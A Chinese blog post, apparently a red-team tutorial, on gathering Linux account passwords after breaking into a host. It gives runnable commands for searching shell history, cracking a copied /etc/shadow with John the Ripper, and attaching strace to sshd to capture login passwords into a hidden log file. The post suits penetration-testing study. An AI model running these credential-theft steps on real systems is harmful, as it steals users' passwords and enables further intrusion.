Linux密码破解(非远程爆破)

最新推荐文章于 2024-03-11 12:41:12 发布
最新推荐文章于 2024-03-11 12:41:12 发布
阅读量3.4k 收藏 7
点赞数
分类专栏: 红队测试 Linux学习笔记 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42465440/article/details/126270604
版权

前言:在通过各种手段(如反弹shell 提权)进入到Linux主机系统中,该如何拿到该系统的账号密码呢?

1.history

通过history的记录,看是否有明文输入的密码。

history|grep root #root可改为其他账号名

2.破解shadow文件(john工具)

利用john工具对shadow文件进行破解

将靶机的/etc/shadow文件转移到自己机器上,或者直接在靶机上破解(不推荐)

获取john源码并编译(本文用的john版本为1.9.0,请自行到官网上选择想用的版本)

https://download.openwall.net/pub/

wget https://www.openwall.com/john/k/john-1.9.0.tar.gz
tar -zxvf john-1.9.0.tar.gz
cd ./src
make clean linux-x86-64
cd ../run

1)简单密码文件破解

注:使用了john自带的一个密码文件:password.lst,可以在安装目录中找到

./john /etc/shadow

2)用户名变化密码破解

注:如一个用户名为test,破解诸如 test123 test1等密码。

./john -single /etc/shadow

3)指定密码文件破解

./john -w:/root/pass.txt /etc/shadow   #自定义密码文件/root/pass.txt

john的其他操作

*破解后得到的密码都会存放在john.pot文件中

*异常中断破解后继续破解

./john -restore

 *不使用密码字典,字母数字遍历组合

注:对于使用了特殊字符的密码可能无法破解成功,另外需要强悍的性能和大量的时间(所以不推荐在靶机上破解,哈哈)

./john -incremental /etc/shadow

3.strace收集明文密码

监控sshd程序

执行命令:监控300秒内,sshd进程的动作,如果在监控的时间段内有用户登录成功,则有记录。

timeout 300 strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &

查看结果

grep -E -A1 'read\(6, ".+f\\0\\0\\0\\f.+"' /tmp/.sshd.log

 

chenguoan-cga
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2024年最全Kali Linux 系统暴力破解压缩包密码工具总结_fcrackzip,2024年最新记录一次腾讯Linux运维岗面试笔试总结
2301_82243070的博客
05-04 1267
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
linux 密码文件 /etc/shadow,SHA512 破解
自我---追梦的博客
07-06 7620
{用户名}:{加密后的口令密码}:{口令最后修改时间距原点(1970-1-1)的天数}:{口令最小修改间隔(防止修改口令,如果时限未到,将恢复至旧口令):{口令最大修改间隔}:{口令失效前的警告天数}:{账户不活动天数}:{账号失效天数}:{保留}所有伪用户的密码都是 “!” 或 “*”,代表没有密码是不能登录的。当然,新创建的用户如果不设定密码,那么它的密码项也是 “!注意,这串密码产生的乱码不能手工修改,如果手工修改,系统将无法识别密码,导致密码失效。比较复杂的密码,进行破解花费的时间会长一些。
第九天 03-破解linux密码
qq_56414082的博客
01-03 1118
普通用户权限能够查看一般etc/passwd中一行记录对应着一个用户,每行记录又被冒号()分隔为7以第一列用户信息root为例:1. 用户名 -root2. 是密码占位符,x表示密码保存在`/etc/shadow`3. UID user id,0为特权用户超管root,1-499为系统用户内置,500-999也是给计算机用的,1000+是给普通用户用的。4. GID,表示所在组,groupID,组号,每个文件都会有对应的用户和组,用户本身会有基本组和附加组。
kalilinux解密shadow文件root密码sha512解密方法
2403_82545517的博客
02-04 1360
1,复制出/etc/shadow 下root加密信息,保存到kalilinux桌面1.txt。2.txt解密后文件 123456.txt生成密码字典文件。解密密码会记录在2.txt文件中。
Linux破解root用户密码
rumil的博客
05-04 4208
grub2-mkpasswd-pbkdf2进行设置密码,生成加密密码,然后修改/etc/grub2.d/00_header文件末尾追加,设置的用户可以是系统有的也可以是没有的,但用户一定要前后必须一致。没有显示用户名,此时就是以谁的名义进行登录,用户名就是谁(以谁的名义执行,就是谁),密码是刚刚设置的密码,按e进入编辑界面,输入用户名和刚刚设置的密码即可进入。进入此界面,如果此时输入的不是刚刚设置的用户和密码,就会被T出来,无法进行密码修改。进入以后,接下来按住向下的方向键,向下找,找到这一行。
Escalate_Linux(3)--通过读取密码文件shadow破解root用户的口令实现提权
苏生要努力
02-22 510
ls -l /etc/shadow 普通用户无查看shadow权限。通过读取密码文件/etc/shadow破解root用户的口令。看到了root密码信息,第二部分为root密码hash。显示破解密码john --show hash.txt。john密码破解工具 (默认字典文件)root采用了弱口令,密码为12345。hash密码破解工具hashcat。接下来对root密码进行破解
Linux破解系统密码
qq_43195222的博客
04-25 738
【代码】Linux破解系统密码
物理接触快速破解linux系统密码.doc
11-10
为什么要去破解linux系统密码哈希?主要有以下几种场景: 1)安全白盒检测弱口令,可使用通过破解哈希去发现是否存在弱口令,相比远程爆破锁死账号要方便和安全; 2)通过一些特殊手段获取到密码哈希,比如黑客入侵...
Python版Mysql爆破小脚本
01-19
Mysql Python版本爆破小脚本,需要安装Python插件MySQL-python.exe,可以看出代码量很少,(注意:里用户名和密码都是类似字典。用法:保存代码为MysqlDatabaseBlasting.py,cmd切换到 MysqlDatabaseBlasting.py路径...
Ladon:大型内网渗透扫描器和Cobalt Strike,Ladon7.2内置94个模块,包含信息收集主机端口扫描服务识别密码爆破突破检测漏洞利用。漏洞检测包含MS17010SMBGhostWeblogicActiveMQTomcatStruts2,密码爆破(MysqlOracleMSSQL)FTPSSH(Linux) VNCWindows(IPCWMISMBNetbiosLDAPSmbHashWmiHashWinrm),远程执行命令(wmiexepsexecatexecsshexecwebshel​​
02-05
Ladon一种用于大型网络渗透性的多线程插件化综合扫描神器,包括端口扫描,服务识别,网络资产,密码爆破,高危漏洞检测以及一键GetShell,支持批量A段/ B段/ C段以及跨7.2版本内置94个功能模块,外部模块18个,通过...
windows下指定IP地址远程访问服务器的设置方法
01-10
我们有很多服务器经常受到外界网络的干扰,入侵者们通过扫描3389端口爆破密码法进入我们的服务器,这时,我们可以配置服务器IP 安全策略来限制一些IP访问,大大提高了服务器的安全。 实验环境: 服务端:server ...
Kali Linux渗透测试(安全牛).txt
04-17
│ 任务018:DNS区域传输、DNS字典爆破、DNS信息.mp4 │ 任务019:搜索引擎、SHODAN.mp4 │ 任务020:SHODAN.mp4 │ 任务021:google搜索:实例.mp4 │ 任务022:其他途径.mp4 │ 任务023:RECON-NG.mp4 │ ├─章 ...
linux中查看用户密码密码破解(加密方式)详解(/etc/shadow文件)
热门推荐
学无止境
04-12 10万+
我们知道linux是一个多用户的操作系统,也就是说在linux系统中存储着很多不同用户的用户名及密码。那么如果某一个用户的密码忘记了怎么办呢? 首先我们得知道,在linux系统中,用户名被存放在了/etc/passwd这个文件中;密码存放在/etc/shadow中。知道这两条重要的信息,那么后面的事情就简单很多了。 如果我们要查看某个用户的密码,我们得先登陆为超级用户才可查看: su ro...
linux密码破解(红帽8)
qq_60229657的博客
11-26 691
echo “111” | passwd --stdin root #修改root密码为123,passwd --stdin root 是 更 改root用户的密码,加上--stdin是接受echo后面的字符串(123)做为密码密码是123。rd.break #我们可以为内核的启动指定 "rd.break" 参数,从而让系统在启动的早期停下来,此时我们可以通过使用 root 权限并结合 chroot 命令完成设置 root 密码的操作。
john破解shadow root密文登录提权
mingyqf的博客
02-17 1024
1.进入/usr/share/wordlists/路径下kali自带的密码字典rockyou.txt.gz进行解压:gzip -d rockyou.txt.gz
/etc/shadow文件详解
最新发布
good good study
03-11 1863
etc/shadowLinux 系统中存储用户加密密码的文件,每行对应一个用户的加密信息。该文件只有系统管理员 root 用户可以访问。
Linux系统破解root密码
myneth的博客
09-06 1955
各个版本linux root用户密码破解
Linux忘记密码破解密码
weixin_47988426的博客
11-17 355
Linux破解密码
shell远程登录爆破
09-09
远程登录爆破是一种尝试通过暴力破解远程登录凭据(用户名和密码)来获取未经授权访问的行为。然而,我强烈不建议使用远程登录爆破的方法,因为它是法的,并且违反了网络安全准则。 使用远程登录爆破工具来暴力破解密码是一种不道德且法的行为。这种行为不仅会给目标系统和网络带来风险,还可能导致法律后果。远程登录爆破攻击可以很容易地被检测到,并且合理配置的系统通常会有防御措施来防止这种攻击。 相反,为了确保远程登录的安全性,我建议使用更安全远程登录方式,比如SSH(Secure Shell)协议。SSH提供了加密的通信通道,可以有效地防止密码被窃听或破解。 使用SSH可以提供更高的安全性,并建议在生产环境中使用。与rlogin相比,SSH提供了更强大的身份验证和加密功能,能够更好地保护远程登录的安全性和机密性。此外,使用SSH还可以避免可能出现的网络连接问题和配置方面的困扰。 总而言之,远程登录爆破是一种不道德且法的行为,应该避免使用。相反,应该考虑使用更安全远程登录方式,如SSH,以确保远程登录的安全性和正确性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值